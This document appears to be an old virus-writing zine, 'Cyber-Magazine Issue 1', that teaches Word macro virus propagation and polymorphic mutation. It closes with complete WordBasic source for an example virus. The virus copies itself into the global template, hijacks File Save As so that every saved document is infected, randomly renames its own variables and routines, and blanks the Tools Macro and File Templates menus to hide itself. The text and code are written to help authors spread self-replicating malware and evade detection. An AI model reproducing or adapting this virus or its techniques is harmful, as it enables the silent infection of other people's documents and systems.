Cyber-Magazine Issue 1
This magazine is dedicated to exploration of other techniques available for Microsoft Word Macro Virus propagation.
First:
It is possible to propagate macros other than with the standard MacroCopy command. It is possible to use the ToolsMacro. Edit command to create a new macro and then insert text into it directly. The text can be copied out of the creating macro using LineUp, LineDown, CharLeft, and CharRight commands with the X, 1 flag set to select the desired text. Follow this with an EditCopy command and the EditPaste in the "blank" macro and you have created a macro without using the MacroCopy command.
This functionality allows you to store all of your macros in one single macro while in "transit" (an infected document) and to "extract" the macros upon delivery to the target (NORMAL.DOT to be infected), including your stealth macros (unless, of course, your stealth macros ARE the infection vector).
(see example virus)
Second:
More Mutation: Using the above technique as a starting point, it is possible to create better mutation than just mutating macro names. It is in fact possible to create mutating variable names and mutating Sub/Function names.
To do so, it is imperative that your code knows exactly where and long the variable/routine-name to be mutated is (at least one sample of it). If you know that one location in a macro will never change, you can use that. Then, you can read in the fixed length name with the GetText$(X,X) command. Now, run your random name generator (making certain to generate a name that is THE SAME LENGTH). Finally, use the EditReplace command to swap out all of the old names for the new names. (see example virus)
You could also keep a separate "dummy" macro or routine that just stores a list of your ever mutating variable names so that you could have mutating lengths as well. That way, you could just read in the first line in the list as your current variable, mutate it, then do your global replace, then move on to the next in your list.
i.e.:
sub dummy
LKJIIEKDG < ---- first variable
LKJS
LKJSOALKJBIEWDLA
POIEWM
SIEFQZCVWT
YJFHBWPVU < -----last variable
end sub
Third:
Even More Mutation: Using a combination of the above techniques, it is possible to create mutating code segments. That is, segments of code that change locations within the body of the code.
Consider if you will: You could create a macro with several subroutines of exactly the same length. Then when it was time to mutate (say at the next document infection), just use your knowledge that your have three subroutines of exactly the same length, starting at line X below the calling routine, and jumble them around.
i.e.
sub Main
segmentA
segmentB
segmentC
end sub
sub segmentA
do some stuff
end sub
sub segmentB
do some other stuff
end sub
sub segmentC
do strange stuff
end sub
could become:
sub Main
segmentA
segmentB
segmentC
end sub
sub segmentB
do some other stuff
end sub
sub segmentC
do strange stuff
end sub
sub segmentA
do some stuff
end sub
or it could become:
sub Main
segmentA
segmentB
segmentC
end sub
sub segmentB
do some other stuff
end sub
sub segmentA
do some stuff
end sub
sub segmentC
do strange stuff
end sub
Or it could become ANY permutation in the set! Plus, the more subroutines you have to "jumble," the better the mutation becomes!
Fourth:
The future? Only you can determine what's in the future. Be creative!
-CyberPhantom
Example Virus: (Infected Document Code)
===============================
Sub MAIN
On Error Resume Next
ToolsMacro .Name = "autoopen", .Show = 1, .Delete
ToolsMacro .Name = "FileSaveAs", .Show = 1, .Delete
ToolsMacro .Name = "XXXXX", .Show = 1, .Delete
AppMinimize
ToolsMacro .Name = "autoopen", .Edit, .Show = 3
StartOfDocument
EndOfDocument 1
EditCopy
DocClose
ToolsMacro .Name = "XXXXX", .Show = 1, .Edit
StartOfDocument
EndOfDocument 1
EditPaste
DocClose 1
ToolsMacro .Name = "XXXXX", .Edit, .Show = 1
StartOfDocument
LineDown 35
LineDown 9, 1
EditCopy
DocClose
ToolsMacro .Name = "FileSaveAs", .Edit, .Show = 1
StartOfDocument
LineDown 1
EndOfDocument 1
EditPaste
DocClose 1
mutat
Payld
stlth
AppRestore
End Sub
Sub FlSvA
Dim _fldg As FileSaveAs
GetCurValues _fldg
Dialog _fldg
If _fldg.Format = 0 Then _fldg.Format = 1
FlNm$ = FileName$()
FlMcr$ = FlNm$ + ":AutoOpen"
MacroCopy "Global:XXXXX", FlMcr$
FileSaveAs _fldg
End Sub
Function Rndnm$
For count = 1 To 5
rndnx = Int(Rnd() * (90 - 65) + 65)
rndnx$ = rndnx$ + Chr$(rndnx)
Next count
Rndnm$ = rndnx$
End Function
Sub Payld
Rndnm = Int(Rnd() * (51 - 1) + 1)
If Rndnm = 50 Then MsgBox "Greetings to: CyberDragon, CyberMonk, CyberBard, CyberSage, CyberTeck, CyberHawk, CyberBeef, CyberLich, CyberKnight. From: CyberPhantom"
End Sub
Sub mutat
ToolsMacro .Name = "XXXXX", .Edit, .Show = 1
StartOfDocument
dnatx$ = GetText$(606, 611)'mutat
EditReplace .Find = dnatx$, .Replace = Rndnm$, .Direction = 0, .MatchCase = 0, .WholeWord = 0, .PatternMatch = 0, .SoundsLike = 0, .ReplaceAll, .Format = 0, .Wrap = 1, .FindAllWordForms = 0
dnatx$ = GetText$(648, 653)'FlSvA
EditReplace .Find = dnatx$, .Replace = Rndnm$, .Direction = 0, .MatchCase = 0, .WholeWord = 0, .PatternMatch = 0, .SoundsLike = 0, .ReplaceAll, .Format = 0, .Wrap = 1, .FindAllWordForms = 0
dnatx$ = GetText$(658, 663)'_fldg
EditReplace .Find = dnatx$, .Replace = Rndnm$, .Direction = 0, .MatchCase = 0, .WholeWord = 0, .PatternMatch = 0, .SoundsLike = 0, .ReplaceAll, .Format = 0, .Wrap = 1, .FindAllWordForms = 0
dnatx$ = GetText$(612, 617)'Payld
EditReplace .Find = dnatx$, .Replace = Rndnm$, .Direction = 0, .MatchCase = 0, .WholeWord = 0, .PatternMatch = 0, .SoundsLike = 0, .ReplaceAll, .Format = 0, .Wrap = 1, .FindAllWordForms = 0
dnatx$ = GetText$(869, 874)'Rndnm
EditReplace .Find = dnatx$, .Replace = Rndnm$, .Direction = 0, .MatchCase = 0, .WholeWord = 0, .PatternMatch = 0, .SoundsLike = 0, .ReplaceAll, .Format = 0, .Wrap = 1, .FindAllWordForms = 0
dnatx$ = GetText$(880, 885)'count
EditReplace .Find = dnatx$, .Replace = Rndnm$, .Direction = 0, .MatchCase = 0, .WholeWord = 0, .PatternMatch = 0, .SoundsLike = 0, .ReplaceAll, .Format = 0, .Wrap = 1, .FindAllWordForms = 0
dnatx$ = GetText$(1299, 1304)'dnatx
EditReplace .Find = dnatx$, .Replace = Rndnm$, .Direction = 0, .MatchCase = 0, .WholeWord = 0, .PatternMatch = 0, .SoundsLike = 0, .ReplaceAll, .Format = 0, .Wrap = 1, .FindAllWordForms = 0
DocClose 1
End Sub
Sub stlth
ToolsMacro .Name = "XXXXX", .Edit, .Show = 1
StartOfDocument
LineDown 123
LineDown 2, 1
EditCopy
DocClose
ToolsMacro .Name = "ToolsMacro", .Edit, .Show = 1
StartOfDocument
LineDown 1
EndOfDocument 1
EditPaste
DocClose 1
ToolsMacro .Name = "XXXXX", .Edit, .Show = 1
StartOfDocument
LineDown 127
LineDown 2, 1
EditCopy
DocClose
ToolsMacro .Name = "FileTemplates", .Edit, .Show = 1
StartOfDocument
LineDown 1
EndOfDocument 1
EditPaste
DocClose 1
End Sub
Sub TlsMc
'No Macro
End Sub
Sub FlTpt
'No Macro
End Sub